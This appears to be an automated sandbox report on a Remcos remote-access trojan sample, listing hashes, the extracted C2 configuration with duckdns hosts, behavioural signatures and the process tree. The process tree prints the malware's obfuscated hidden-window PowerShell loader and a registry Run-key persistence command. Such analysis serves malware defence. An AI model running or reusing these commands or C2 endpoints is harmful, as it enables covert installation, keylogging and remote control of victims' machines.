Overview
overview
10Static
static
1DOCUMET788...@!.exe
windows7-x64
8DOCUMET788...@!.exe
windows10-2004-x64
10Flanr.fje
windows7-x64
3Flanr.fje
windows10-2004-x64
3Krieker213.ps1
windows7-x64
3Krieker213.ps1
windows10-2004-x64
8Modisterne.pse
windows7-x64
3Modisterne.pse
windows10-2004-x64
3Uncleanness.eug
windows7-x64
3Uncleanness.eug
windows10-2004-x64
3dendropogon.txt
windows7-x64
1dendropogon.txt
windows10-2004-x64
1hjemstedsk...ne.cel
windows7-x64
3hjemstedsk...ne.cel
windows10-2004-x64
3olieraffin...rs.fat
windows7-x64
3olieraffin...rs.fat
windows10-2004-x64
3Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16/01/2025, 08:58
Static task
static1
Behavioral task
behavioral1
Sample
DOCUMET7887RAMADA@#$@!.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
DOCUMET7887RAMADA@#$@!.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Flanr.fje
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Flanr.fje
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Krieker213.ps1
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Krieker213.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Modisterne.pse
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Modisterne.pse
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Uncleanness.eug
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Uncleanness.eug
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
dendropogon.txt
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
dendropogon.txt
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
hjemstedskommunerne.cel
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
hjemstedskommunerne.cel
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
olieraffinaderiers.fat
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
olieraffinaderiers.fat
Resource
win10v2004-20241007-en
General
-
Target
DOCUMET7887RAMADA@#$@!.exe
-
Size
1.2MB
-
MD5
6dbfced7845c936a56c3685329dc24d9
-
SHA1
416db985d9b8defa1b99d17956aae3d767d9d92b
-
SHA256
304947e91f66751b25d0899c7b9feffe43a5620b13fd5de4a8c5642d638ce45f
-
SHA512
9ca83f6d19299abdfa872713d3646737e6319ef4c422d0af7c9bbd237a199f058126f05a451c91057970ac000d885b35b34fd3d46307947ee67847af6dca96f4
-
SSDEEP
24576:myZDPLNLlTznkEU9gld5cYSOXQkPoNW+8pwcyLy2wFV3y:PrLlTgEcgzXX1PYAFn3y
Malware Config
Extracted
remcos
Sent
haleleeh8iuoty1.duckdns.org:8347
haleleeh8iuoty1.duckdns.org:37830
haleleeh8iuoty2.duckdns.org:8347
haleleeh8iuoty3.duckdns.org:8347
haleleeh8iuoty4.duckdns.org:8347
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
kmirtup.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
aksoetuise-Y9DD4X
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4764 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bemixt = "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\\Software\\Genindlggelsen\\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)" reg.exe -
Blocklisted process makes network request 7 IoCs
flow pid Process 24 4844 msiexec.exe 26 4844 msiexec.exe 28 4844 msiexec.exe 30 4844 msiexec.exe 34 4844 msiexec.exe 37 4844 msiexec.exe 52 4844 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 drive.google.com 24 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4844 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4764 powershell.exe 4844 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\deistic.ini DOCUMET7887RAMADA@#$@!.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\resources\bumpee\Ressourcekrvende.lnk DOCUMET7887RAMADA@#$@!.exe File opened for modification C:\Windows\Fonts\sluttishly\nonfeverish.tin DOCUMET7887RAMADA@#$@!.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DOCUMET7887RAMADA@#$@!.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3860 reg.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4764 powershell.exe 4764 powershell.exe 4764 powershell.exe 4764 powershell.exe 4764 powershell.exe 4764 powershell.exe 4764 powershell.exe 4764 powershell.exe 4764 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 4764 powershell.exe Token: SeIncreaseQuotaPrivilege 4764 powershell.exe Token: SeSecurityPrivilege 4764 powershell.exe Token: SeTakeOwnershipPrivilege 4764 powershell.exe Token: SeLoadDriverPrivilege 4764 powershell.exe Token: SeSystemProfilePrivilege 4764 powershell.exe Token: SeSystemtimePrivilege 4764 powershell.exe Token: SeProfSingleProcessPrivilege 4764 powershell.exe Token: SeIncBasePriorityPrivilege 4764 powershell.exe Token: SeCreatePagefilePrivilege 4764 powershell.exe Token: SeBackupPrivilege 4764 powershell.exe Token: SeRestorePrivilege 4764 powershell.exe Token: SeShutdownPrivilege 4764 powershell.exe Token: SeDebugPrivilege 4764 powershell.exe Token: SeSystemEnvironmentPrivilege 4764 powershell.exe Token: SeRemoteShutdownPrivilege 4764 powershell.exe Token: SeUndockPrivilege 4764 powershell.exe Token: SeManageVolumePrivilege 4764 powershell.exe Token: 33 4764 powershell.exe Token: 34 4764 powershell.exe Token: 35 4764 powershell.exe Token: 36 4764 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4844 msiexec.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 1528 wrote to memory of 4764 1528 DOCUMET7887RAMADA@#$@!.exe 82 PID 1528 wrote to memory of 4764 1528 DOCUMET7887RAMADA@#$@!.exe 82 PID 1528 wrote to memory of 4764 1528 DOCUMET7887RAMADA@#$@!.exe 82 PID 4764 wrote to memory of 4844 4764 powershell.exe 89 PID 4764 wrote to memory of 4844 4764 powershell.exe 89 PID 4764 wrote to memory of 4844 4764 powershell.exe 89 PID 4764 wrote to memory of 4844 4764 powershell.exe 89 PID 4844 wrote to memory of 5076 4844 msiexec.exe 92 PID 4844 wrote to memory of 5076 4844 msiexec.exe 92 PID 4844 wrote to memory of 5076 4844 msiexec.exe 92 PID 5076 wrote to memory of 3860 5076 cmd.exe 94 PID 5076 wrote to memory of 3860 5076 cmd.exe 94 PID 5076 wrote to memory of 3860 5076 cmd.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\DOCUMET7887RAMADA@#$@!.exe"C:\Users\Admin\AppData\Local\Temp\DOCUMET7887RAMADA@#$@!.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Dynamik=GC -raw 'C:\Users\Admin\AppData\Roaming\Brixvold\reclusely\Krieker213.Fla';$balsal=$Dynamik.SubString(57497,3);.$balsal($Dynamik)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" /t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" /t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3860
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
331KB
MD506acea567a0ded05680dbb9de58d0311
SHA1e84e2cde7049ce616b5cc579ce4b4d837423e586
SHA256fd3f116786b5db01589d0460c9e1ffccdc468237ee2db9941482c904bc20500b
SHA512e5c9492b5c49f75c92f45c9b577d67854d989e5672cfc3c2f8b4e831b00082f180834080e398bef69dcd0d3611d4404879e4b6ee9ef57afb2c421ea7f422bc14
-
Filesize
56KB
MD571ec49d3afc6876b0238400570d4028d
SHA1e661e5ca92fa77b576dd75c8d981936b2db5be88
SHA256178d63022c2e5d42cd6f8dd983b8a4a19568e1370efad6c9c51f4b8807964885
SHA512dae10533f8b54e5dcd1e929a2af3270f201e22566961d27ef4c52ad359b821a4b95bab5469047fe61271111876208833450010d8cf1ce9bd73edcd829d6f21e2